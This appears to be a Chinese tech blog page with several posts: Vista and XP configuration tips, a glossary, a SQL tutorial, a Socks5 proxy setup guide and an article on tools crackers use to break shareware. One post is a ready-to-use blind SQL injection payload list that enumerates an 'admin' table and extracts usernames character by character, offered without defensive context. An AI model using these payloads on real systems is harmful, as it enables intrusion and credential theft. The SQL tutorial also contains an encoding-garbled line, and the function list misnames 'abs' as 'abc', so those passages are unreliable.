by ·2条评论

  现在好多朋友装上了Vista,XP的双系统。但是因为现在Vista的启动菜单变了,使得重装XP以后,XP安装程序会将Vista的安装菜单覆盖。这个时候我们就需要恢复Vista的引导菜单。

  其实在XP下恢复Vista的引导菜单是件很容易的事情,比在98下恢复XP的菜单方便多了,呵呵。就是放进Vista的安装光盘。进入命令提示符方式,在光盘的Boot目录下执行:

  Bootsect /nt60 C:

  这样就可以修复Vista的引导菜单了。怎样?简单吧?

by ·0评论

  1. 如何关闭UAC?

  控制面板→用户帐户→打开或关闭用户账户控制→取消使用用户账户控制(UAC)帮助保护您的计算机。

  2. 如何关闭系统备份与还原?

  控制面板→备份和还原中心→创建还原点或更该设置→系统保护→自动还原点→取消已经选中的磁盘上的还原点。

  3.为什么在某个固定的时间会出现狂读硬盘的现象?

  这是因为Vista自动执行磁盘碎片整理计划的缘故,关闭的方法是通过开始菜单→附件→系统工具→磁盘碎片整理程序→取消“按计划运行(推荐)”

  4. 如何关闭计算机进入休眠状态?

  桌面右键→个性化→屏幕保护程序→更改电源设置→更改计算机的睡眠时间→使计算机进入睡眠状态设为从不。

  5. 开始菜单电源按钮默认设定为“休眠”,如何更改为“关机”?

  控制面版→电源选项→选中的“首选计划”→更改计划设置→更改高级电源设置,在弹出的设置窗口中找到“电源按钮和盖子”→“开始”菜单电源按钮→设置→关机,确定即可 完成设置。

  6.每次开机时在安全中心都会提示,如何关闭这个提示信息?

  控制面板→安全中心→更改安全中心通知我的方法→选择不通知我,但显示图标。

  7. 如何在非传统开始菜单中显示运行命令?

  任务栏和开始菜单属性→开始菜单→自定义→选中“运行命令”。

  8.如何取消每次开机的默认共享?

  将下列内容导入注册表,重启即可(前提是要关闭UAC)。

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanserverParameters]

  AutoShareWks=dword00000000

  [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]

  restrictanonymous=dword00000001

  9.如何实现自动登陆?

  开始→运行→输入“rundll32 netplwiz.dll,UsersRunDll”命令打开帐户窗口,先选中要自动登陆的账户,去选“要使用本机,用户必须输入用户名密码”复选框,输入该帐户的 密码即可(前提是要关闭UAC)。

  10. 如何更改媒体文件使用WMP以外的播放器播放?

  选中媒体文件→右键菜单→打开方式→选择默认程序→选择播放程序→选中“始终使用选择的程序打开这种文件”。

  11. 为何我无法实现局域网互访?

 

  从以下几个方面入手:

  本地连接→右键属性→取消Internet协议版本6,缩短验证时间。

  检查机器工作组名称是否一致。

  检查机器IP是否在同一网段,如192.168.1.X。

  将网络和共享中心→网络连接→自定义→位置类型设置为专用,降低保护。

  12.开启ICF后局域网内机器如何实现互访?

  Windows防火墙取消阻止所有传入连接,并在“例外”中选中“文件和打印机共享”。

  13.如何实现用管理员(Administrator) 账户登陆?

  计算机→管理→本地用户和组→用户→Administrator账户→属性→取消账户已禁用选项,当前使用账户→属性→选中账户已禁用选项。

  14. 打开控制面板报错“Windows资源管理器已经停止工作”,要如何修复?

  硬件驱动冲突,可能和声卡驱动有关,尝试重新安装声卡驱动。

  15. 如何快速复制文件、文件夹路径?

  按 Shift 键,右键需要复制路径的文件、文件夹或快捷方式等,在弹出菜单里面有一项复制为路径(A),点击后可复制该文件、文件夹路径。

  16. 如何察看系统许可信息?

  运行slmgr.vbs -dlv。

  17. 文件反向选择的快捷键是什么?

  ALT+E弹出菜单后按I。

  18.如何更改桌面上的图标的大小?

  Ctrl+鼠标滚轮或者桌面右键→查看→经典图标。

  19.如何使用3D方式切换程序?

  在开启Aero外观的情况下,使用Win(视窗键)+Tab可以使用3D方式切换程序,Win(视窗键)+Ctrl+Tab可以使程序3D窗口暂时停留在桌面上。

  20.如何设置IE浏览器代理?

  打开IE工具栏的Internet选项→连接→拨号和虚拟专用网络设置中选中您的拨号连接→设置,在“设置”页面中,选中“对此连接使用代理服务器”然后在“地址”栏中填上代理 服务器地址和端口,单击“确定”。

  21. 如何查看某个进程的PID值?

  任务管理器→查看→选择列中可以进行选择。

  22. 如何实现退出系统时清除最近打开的文档的历史?

  运行gpedit.msc,用户配置→管理模板→『开始』菜单和任务栏→退出系统时清除最近打开文档的历史,设为已启用就可以了。

 

解决Vista狂读硬盘现象:
1. 取消磁盘碎片整理
2. 关闭Windows Defender
3. 关闭系统还原

by ·0评论

3月28日,PCWorld评选出101个绝佳的免费产品,其中很多都是我们大家所熟知的。下面是这101个免费产品的名单:

Fantastic Freebies, by Category

System Utilities

Windows XP Tweaks
Windows Vista Tweaks
Security Software
Registry Cleaner
Hardware Utility

Communications and File Sharing

E-Mail for Free
File Sharing
Instant Messaging, Voice, and Video

Blogs and News Reading

Personal Web
Online RSS Reader
Software RSS Reader

Blogging Site

File Management

Desktop Search
Backup and File Synchronization

Productivity and Office Apps

Office Software and Services
Time Management
Notepad Replacement
Business Productivity

Music, Photos and Video

Entertainment Software
Image Editing
Web Video Site
Multimedia Tools and Toys

 

by ·2条评论

  许多朋友提出了他们对一些系统的技术词汇不甚了解,我们特别总结了一批常用词汇逐一解释。

  Access control list (ACL)

  访问控制列表,其中存放了有关是谁,可以对什么目标进行访问,以及对谁实施的相关权限。

  ActiveX

  一个微软开发出来的技术,是OLE和COM的结合产物(OLE,对象链接和嵌入;COM,组件对象模型),允许网页开发人员来建立交互性的网页,并提供和Java小程序同样的功能。

  Ad hoc wireless network

  Ad hoc无线网络。一种802.11 wi-fi网络,以电脑到电脑的方式运作,而不是通过一个无线接入点(WAP)。

  Admin Approval Mode

  管理批准模式。Vista在以标准用户权限运行绝大多数程序时的默认设定,即便你是以系统管理员帐号登录的;在必要时会要求进行权限的提升以提高权限级别。

  Aero

  Windows Vista的全新用户界面,不用于入门版和家庭基本版。

  Aero Glass

  Aero界面中争论最热烈的图形界面。它提供了三维动画,透明,以及其他可视效果,但是要求很高的系统资源,以及一块兼容directx 9的显卡。

  Anti-spyware

  反间谍软件。使用预先定义的文件以及启发式逻辑来探测电脑中已知的或者潜在的间谍软件,并对用户提出警告,移除或隔离相关间谍软件。

  Avalon

  请看 "Windows Presentation Foundation" (WPF).

  Bcdedit

  在Windows Vista中的一个命令行工具,用于建立和重新配置bootloader,后者无须再使用boot.ini文件。

  BitLocker

  在Windows Vista企业版和高级版中提供的一个安全功能,可以使用一个TPM芯片或者一个USB钥匙盘对整个操作系统卷进行加密。

  Custom Scan

  自定义扫描。防护程序的一个选项,仅对你指定的位置进行扫描。

  Defender

  防护程序 (可以查看Windows Defender)

  Desktop Search

  桌面搜索。一个内置于Windows Vista中的功能,让你可以根据文件名(或部分文件名)、日期、作者、以及很多其他属性来对文件进行搜索,可以从“开始菜单”中直接进入。

  Desktop Windows Manager (DWM)

  桌面窗口管理器。一个Windows Vista中的窗口系统,支持Aero(除入门版和家庭基本版以外),用于处理如何勾画屏幕上的内容。

  Encrypting File System (EFS)

  加密文件系统(EFS)。一个基于数字认证的加密方式,内置于Windows 2000, XP, 2003, 以及Vista之中;它允许用户可以仅针对单个文件或者单个文件夹进行加密,以保护数据的机密性。

  Exceptions

  例外。没有受到Windows防火墙,程序,服务,或者端口的阻挡的,自由进出的数据包。

  File/registry virtualization

  文件/注册表虚拟化。一个新功能,让一个程序只能虚拟化的看到自己试图修改的部分资源

  Firewall profiles

  防火墙配置文件。不同的防火墙配置用于不同的情况之下;举例来说,一个配置文件可能会被用于在连接公司网络之时,而另一个则用于连接家庭网络的时候,而第三个则用于连接到一个公共场所的无线热点上时使用。

  翻动/三维翻动

  在Windows Vista中的全新窗口管理功能,允许你使用[Alt][Tab]在打开的窗口缩小图之间翻动。而使用三维翻动的话,通过使用Windows键加上TAB键,就可以在一个三维的运行窗口堆叠上进行翻动,使用鼠标上的滚轮或者轨迹球,也同样可以达到翻动的效果。

  Full Scan

  完全检查。一个防护程序选项,对整台电脑全部进行搜索(包括所有硬盘上的文件和文件夹)。

  Heuristics

  启发式逻辑。在防护程序的内容中,有一种方式,可以在程序没有被相关定义最终确认之前,根据程序的行为以及关键模式,来确定一个程序是否更像是间谍软件.

  ICMP

  ICMP,互联网控制信息协议(Internet Control Message Protocol),用于错误报告和调试。ICMP回应请求,并回应流行的Ping命令所使用的回复信息。

  Internet Explorer 7

  互联网浏览器IE的第七版。提供在Windows Vista之中的新网页浏览器(现在也有了一个用于Windows XP的版本),能够提供标签化浏览,全新的安全机制,以及很多其他的增强功能。

  Internet Explorer Protected Mode

  IE 7保护模式。一种IE 7在Windows Vista之中的新操作模式,使用Vista的用户帐户控制(UAC)来将IE和其他软件区别开,在没有用户许可的情况下,将阻止其插件向除Temporary Internet Files文件夹以外的任何地方写入内容。

  Internet Information Services (IIS) 7.0

  Internet信息服务(IIS) 7.0。内置于Windows Vista之中的网页服务器,可以使用一个模块结构进行重写,并将网页服务器的配置写入XML文件之中,而不是再使用metabase。

  IPSec

  互联网协议安全(Internet Protocol Security),一个标准机制,用于在网络层面上为穿越IP网络的数据包提供认证,完整性,以及机密性。

  IPv6

  下一版本的IP协议,属于TCP/IP协议套装的一个网络层组件;它通过使用128位的地址而扩展了地址空间(与之相比,IPv4使用的是32位地址),并提供了更好的安全机制。

  Kerberos

  一种认证标准,通过使用一台中央服务器来提供“票据”,供其他在网络上提供资源的服务器进行识别。在Windows 2000, XP, Server 2003, Vista, 以及Longhorn, 还有UNIX系统,都对它进行支持。

  Legacy applications

  遗留程序。在Vista之前书写的,没有使用UAC规范的程序。

by ·5条评论

  如果你为XP的用户设置了密码,但是又不想在每次启动的时候输入密码,那你可以像下面这样做:

  在“运行”里输入“control userpasswords2”,在弹出的窗口中取消“要使用本机,用户必须输入用户名和密码”。确认以后在弹出的对话框里面输入你需要默认登陆的用户名和密码。就大功告成了!

by ·0评论

检测可否注入
http://127.0.0.1/xx?id=11 and 1=1 (正常页面)
http://127.0.0.1/xx?id=11 and 1=2 (出错页面)

检测表段的
http://127.0.0.1/xx?id=11 and exists (select * from admin)

检测字段的
http://127.0.0.1/xx?id=11 and exists (select username from admin)

检测ID
http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)

检测长度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)

检测长度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)

检测是否为MSSQL数据库
http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)

检测是否为英文

(ACCESS数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)

(MSSQL数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)

检测英文的范围

(ACCESS数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)

(MSSQL数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)

检测那个字符

(ACCESS数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)

(MSSQL数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)

常用函数

Access:asc(字符) SQLServer:unicode(字符)
作用:返回某字符的ASCII码

Access:chr(数字) SQLServer:nchar(数字)
作用:与asc相反,根据ASCII码返回字符

Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)
作用:返回字符串从N个字符起长度为L的子字符串,即N到N+L之间的字符串

Access:abc(数字) SQLServer:abc (数字)
作用:返回数字的绝对值(在猜解汉字的时候会用到)

Access:A between B And C SQLServer:A between B And C
作用:判断A是否界于B与C之间

and exists(Select top 1 * From 用户 order by id)

1.在查询结果中显示列名:

a.用as关键字:select name as ’姓名’ from students order by age
b.直接表示:select name ’姓名’ from students order by age

2.精确查找:

a.用in限定范围:select * from students where native in (’湖南’, ’四川’)
b.between…and:select * from students where age between 20 and 30

c.“=”:select * from students where name = ’李山’

d. like:select * from students where name like ’李%’ (注意查询条件中有“%”,则说明是部分匹配,而且还有先后信息在里面,即查找以“李”开头的匹配项。所以若查询有“李”的所有对象,应该命令:’%李%’;若是第二个字为李,则应为’_李%’或’_李’或’_李_’。)

e.[]匹配检查符:select * from courses where cno like ’[AC]%’ (表示或的关系,与"in(…)"类似,而且"[]"可以表示范围,如:select * from courses where cno like ’[A-C]%’)

3.对于时间类型变量的处理

a.smalldatetime:直接按照字符串处理的方式进行处理,例如:select * from students where birth > = ’1980-1-1’ and birth <= ’1980-12-31’

4.集函数

a.count()求和,如:select count(*) from students (求学生总人数)
b.avg(列)求平均,如:select avg(mark) from grades where cno=’B2’
c.max(列)和min(列),求最大与最小

5.分组group

常用于统计时,如分组查总数:select gender,count(sno) from students group by gender(查看男女学生各有多少)
注意:从哪种角度分组就从哪列"group by"
对于多重分组,只需将分组规则罗列。比如查询各届各专业的男女同学人数 ,那么分组规则有:届别(grade)、专业(mno)和
性别(gender),所以有"group by grade, mno, gender"
select grade, mno, gender, count(*) from students group by grade, mno, gender
通常group还和having联用,比如查询1门课以上不及格的学生,则按学号(sno)分类有:
select sno,count(*) from grades where mark<60 group by sno having count(*)>1

6.UNION联合

合并查询结果,如:
SELECT * FROM students WHERE name like ‘张%’UNION [ALL] SELECT * FROM students WHERE name like ‘李%’

7.多表查询

a.内连接
select g.sno,s.name,c.coursename from grades g JOIN students s ON g.sno=s.sno JOIN courses c ON g.cno=c.cno
(注意可以引用别名)

b.外连接

b1.左连接

select courses.cno,max(coursename),count(sno) from courses LEFT JOIN grades ON courses.cno=grades.cno group by courses.cno

左连接特点:显示全部左边表中的所有项目,即使其中有些项中的数据未填写完全。

左外连接返回那些存在于左表而右表中却没有的行,再加上内连接的行。

b2.右连接

与左连接类似

b3.全连接

select sno,name,major from students FULL JOIN majors ON students.mno=majors.mno

两边表中的内容全部显示

c.自身连接

select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno

采用别名解决问题。

d.交*连接

select lastname+firstname from lastname CROSS JOIN firstanme

相当于做笛卡儿积

8.嵌套查询

a.用关键字IN,如查询猪猪山的同乡:

select * from students where native in (select native from students where name=’猪猪’)

b.使用关键字EXIST,比如,下面两句是等价的:

select * from students where sno in (select sno from grades where cno=’B2’)
select * from students where exists (select * from grades where grades.sno=students.sno AND cno=’B2’)

9.关于排序order

a.对于排序order,有两种方法:asc升序和desc降序

b.对于排序order,可以按照查询条件中的某项排列,而且这项可用数字表示,如:
select sno,count(*) ,avg(mark) from grades group by sno having avg(mark)>85 order by 3

10.其他

a.对于有空格的识别名称,应该用"[]"括住。

b.对于某列中没有数据的特定查询可以用null判断,如select sno,courseno from grades where mark IS NULL

c.注意区分在嵌套查询中使用的any与all的区别,any相当于逻辑运算“  ”而all则相当于逻辑运算“&&”

d.注意在做否定意义的查询是小心进入陷阱:

如,没有选修‘B2’课程的学生 :
select students.* from students, grades where students.sno=grades.sno AND grades.cno <> ’B2’

上面的查询方式是错误的,正确方式见下方:
select * from students where not exists (select * from grades where grades.sno=students.sno AND cno=’B2’)

11.关于有难度多重嵌套查询的解决思想:如,选修了全睝@纬痰难?br>select * from students where not exists (select * from courses where NOT EXISTS (select * from grades where sno=students.sno AND cno=courses.cno))

最外一重:从学生表中选,排除那些有课没选的。用not exist。由于讨论对象是课程,所以第二重查询从course表中找,排除那些选了课的即可

by ·0评论

Linux本身可以通过添加插座软件包起到代理防火墙的作用,而且这一切都是免费的。

什么是代理防火墙

 代理防火墙不让任何直接的网络流通过,而由它作为互联网和内部网络计算机之间的中间媒介。防火墙自己处理各种网络服务而不是只让它们直接通过。例如,登录到网络上的计算机请求一个网页。计算机不直接链接到网络服务提供的网页,而是连到自己网络的代理服务器上,代理服务器识别代理请求,然后以合适的方式传递给相应的网络服务器。远程网络服务器视为来自防火墙服务器的正常网络请求,发送合适的网页,防火墙服务器再把网页返送给计算机。

 这样,防火墙就对Internet隐蔽了你的计算机存在的事实,减少外界对内部网络的可见性。

 安装

 1.在http://www.socks.nec.com/cgi-bin/download.pl站点找到Socks软件包,在下载前要填写有关的用户信息,然后单击[Submit]按钮,此后登录到具有下载链接的页面,单击链接来下载插座软件包。

 2.在存储下载的Socks软件包的目录中,使用Tar命令解开该软件包。

 Tar – xzvf sock5-vl. 0r11.tar.gz

 此命令创建一个sock5-vl. 0r11目录,把软件包解压到该目录中,使用CD命令变成该目录。该目录中有一个编辑和安装软件包的配置脚本。使用Su命令变成根用户,然后在命令提示下运行脚本。

 3.输入Make命令编译Socks包,完成以后,通过输入Make Install命令安装软件包。

 注意:在使用之前,必须在/etc目录下创建一个Socks5.conf文件,Socks5检查/etc/socks5.conf文件得知将代理什么协议和服务,以及哪个计算机将能够使用此代理服务。

 创建Socks5.conf文件

 Socks5.conf文件被分成6部分。每一部分控制Socks5守护进程处理特定链接的一个特别项,当一个客户计算机连到代理服务器上,Socks5连续搜索每一部分的每一行,并根据遇到的规则决定采取什么行动,当找到与处理的链接相匹配的规则行时停止,所以规则的顺序很重要。

 1.主机地址标志。主机地址可以是完整的主机名或IP地址,例如:gzdd .sjsgz .net或10.88.56.4,它也可能是一个部分主机名或地址,例如:. sjsgz .net或10 .88.56.4。

 注意:部分主机名以点(.)字符开始就允许Socks识别部分主机名用它匹配Sjsgz .net域的任何主机。

 2.禁止主机部分。禁止主机部分用于禁止对指定主机和协议的代理服务。一个禁止主机行总是以关键词Ban开始,后跟源主机参数和一个源端口参数。

 命令格式:Ban source-host sour-ce-port

 例如:Ban gzdd.sjsgz.net http,表明主机gzdd被禁止访问系统上的网络服务;Ban 199.170.176.-,表明199.170.176.x网上主机都不可访问系统上任何代理服务;Ban – -,表明任何主机不可访问此系统的任何代理服务。

 3.访问控制部分。这是Socks5.conf文件最有用的部分,访问控制部分用于允许或禁止基于源和目的机器的主机地址或端口号的代理连接,访问控制行总以关键词Permit或关键词Deny开头。

 命令格式:Permit auth cmd src-host dest-host src-port dest-port或Deny auth cmd src-host dest-host src-port dest-port

例如:Permit – – 10.88.56. – 1880 http,表明允许在10.88.56. x网段的主机通过端口1880访问网络;Deny – – – – – -,表明拒绝所有连接。

 当一个客户机连到代理服务器上时,Socks扫描控制行列表,若找不到匹配的Socks拒绝连接。

 启动Socks5服务

 可以用手工启动守护进程,只需以根用户登录,在命令提示符下输入Socks5,Socks5守护进程被放到背景执行并返回提示符。也可以把Socks5命令放入/etc/rc.d下的Rc.local启动脚本中,以使下次启动机器时自动启动Socks5。尽管仍以根用户登录,但还需要把/etc/rc.d/rc.local文件调入文本编辑器并在文件末加入以下几行:

 # Start socks5 proxy services

 /usr/local/bin/socks5

 完成后存贮文件并退出编辑器。

 这样通过在Linux中安装软件包,创建Socks5文件,使得Linux起到代理防火墙的作用,保证校园网络的安全。

by ·0评论

  影响共享软件发展的因素很多,被非法破解可以说是共享软件的头号大敌。那么造成共享软件生存困难的cracker们到底用了那些武器呢?今天就让我让带您去看看神秘的cracker常用的十类软件,它们就是共享软件的十大杀手!

  一. 调试类工具soft-ice和trw2000。

  soft-ice是目前公认最好的跟踪调试工具。使用soft-ice可以很容易的跟踪一个软件、或是监视软件产生的错误进行除错,它有dos、window3.1、win95/98/nt/2000/各个平台上的版本。这个本是用来对软件进行调试、跟踪、除错的工具,在cracker手中变成了最恐怖的破解工具;trw2000是中国人自己编写的调试软件,完全兼容soft-ice各条指令,由于现在许多软件能检测soft-ice存在,而对trw2000的检测就差了许多,因此目前它成了很多cracker的最爱。trw2000专门针对软件破解进行了优化,在windows下跟踪调试程序,跟踪功能更强;可以设置各种断点,并且断点种类更多;它可以象一些脱壳工具一样完成对加密外壳的去除,自动生成exe文件,因此它的破解能力更强,在破解者手中对共享软件的发展威胁更大。它还有在dos下的版本,名为tr。

  二. 反汇编工具wdasm8.93黄金版和hiew。

  cracker常将soft-ice和trw2000比作屠龙刀,将wdasm8.93则比作倚天剑。wdasm8.93可方便地反汇编程序,它能静态分析程序流程,也可动态分析程序。在原有的普通版的基础上,一些破解者又开发出了wdasm8.93黄金版,加强了对中文字符串的提取。对国产共享软件的威胁也就更大了。例如开心斗地主这个很好玩的共享软件,用黄金版对其反汇编可以直接看到注册码,普通版不能,您说它厉害不?hiew是一个十六进制工具,它除了普通十六进制的功能外,它还有个特色,能反汇编文件,并可以用汇编指令修改程序, 用它修改程序,方便快捷!这也是cracker们常用的静态反汇编工具。

  三. visual basic程序调试工具smartcheck。

  这是专门针对visual basic程序的调试程序,由于vb程序执行时从本质上讲是解释执行,它们只是调用 vbrunxxx.dll 中的函数 ,因此vb 的可执行文件是伪代码,程序都在vbxxx.dll 里面执行。若用soft-ice跟踪调试只能在vbdll里面用打转转,看不到有利用价值的东西,而且代码质量不高,结构还很复杂。当然只要了解其特点用soft-ice也可破解 ,但smartcheck的出现,大大方便了cracker。smartcheck 是 numega 公司出口的一款出色的调试解释执行程序的工具,目前最新版是v6.03。它非常容易使用,你甚至于不需要懂得汇编语言都能轻易驾驭它。它可将vb程序执行的操作完全记录下来,使破解者轻而易举的破解大部分vb程序。

  四. 十六进制编辑器ultraedit。

  十六进制编辑器可以用十六进制方式编辑文件,修改文件的内容。虽然hiew就是一款是十六进制工具,但它是dos界面,因此很多破解者又准备了一款windows下的工具,这样的工具很多,如:ultraedit、winhex、hex workshop 等,其中ultraedit比较有特色,操作方便,更有汉化版可用,它是非常出色的十六进制编辑器,建议您也找一个用用。

  五. 注册表监视工具

  主要有regshot、regmon或regsnap等。在微软操作系统中,众多的设置都存放在注册表中,注册表是windows的核心数据库,表中存放着各种参数,直接控制着windows的启动、硬件驱动程序的装载以及一些windows应用程序的正常运行。在应用软件安装时,有可能将一些必要的信息放进去,如安装时间、使用次数、注册码等。regshot、regmon或regsnap就是监视注册表变化的工具,通过它可以了解、监视应用程序在注册表中的动作,破解者常利用它们来监视应用程序在注册表中的变化。

  六. 文件监视工具filemon。

  可监视系统中指定文件运行状况,如指定文件打开了哪个文件,关闭了哪个文件,对哪个文件进行了数据读取等。通过它,任何您指定监控的文件有任何读、写、打开其它文件的操作都能被它监视下来,并提供完整的报告信息。破解者经常利用filemon监控文件系统,以便了解程序在启动、关闭或验证注册码时做了哪些手脚,并由此进行相应的解密。

  七. 脱壳工具procdump。

  现在许多软件都加了壳,“壳”是一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行,拿到控制权,然后完成它们保护软件的任务。经过加壳的软件在跟踪时已无法看到其真实的十六进制代码,因此可以起到保护软件的目的。procdump就是个对付软件加壳的脱壳工具,它可剥去许多种壳,还文件本来面目,这样再修改文件内容就容易多了。由于它还允许使用者自己编写脚本文件,因此利用它能脱去新版加壳软件的壳。它同时还是一款优秀的pe格式修改工具,是脱壳必备工具!

  八. 侦测文件类型工具

  这样的工具有typ、gtw、fileinfo和冲击波2000等。它们被用来侦测软件被加壳类型,其中冲击波2000能轻易的找到任何加密壳的入口点,包括asprotect以及幻影的加密壳都可以。这类软件一般是配合procdump和调试软件使用的,用它们找到程序加壳类型,用procdump或soft-ice、trw2000脱壳。

  九. 资源修改器 exescope。

  exescope是一个可以修改软件资源的工具,功能强大。 exescope能在没有资源文件的情况下分析、显示不同的信息,重写可执行文件的资源,包括(exe,dll,ocx)等。它可以直接修改用 vc++ 及 delphi 编制的程序的资源,包括菜单、对话框、字串表等,是汉化软件的常用工具。在破解者手中,它常被用来修改文件资源中的菜单、对话框、字串表等,用以显示破解者需要的信息(例如更改版权信息等),以此达到修改软件的目的。

  十. api调用查询工具api spy。

  顾名思义,这个程序是用来侦测软件都调用了哪些api。 api就是windows程序执行时所呼叫的函数,跟dos下的int(中断)差不多,windows 提供了很多这样的函数让程序设计者套用,主要目的是为了节省软件开发的时间,方便大家开发软件。api spy就是这样一个监控api调用的软件,它可以查看应用程序调用了哪些api,从而得出对破解者有用的api调用信息,通过这些api调用来设定断点,达到破解软件的目的。它可以工作在windows95/98/nt/2000平台下。

  好了,共享软件的十大杀手为您介绍完了,如何对付它们就是您的事了。需要说明的一点是,以上提到的软件都是“正当”软件,只是在不同的使用者手中发挥了不同的用途。就犹如一把枪,在人民军队手中就是保家卫国的武器,在为非作歹的坏人手中就是一把凶器了,千万不能此就对这些软件产生成见哦!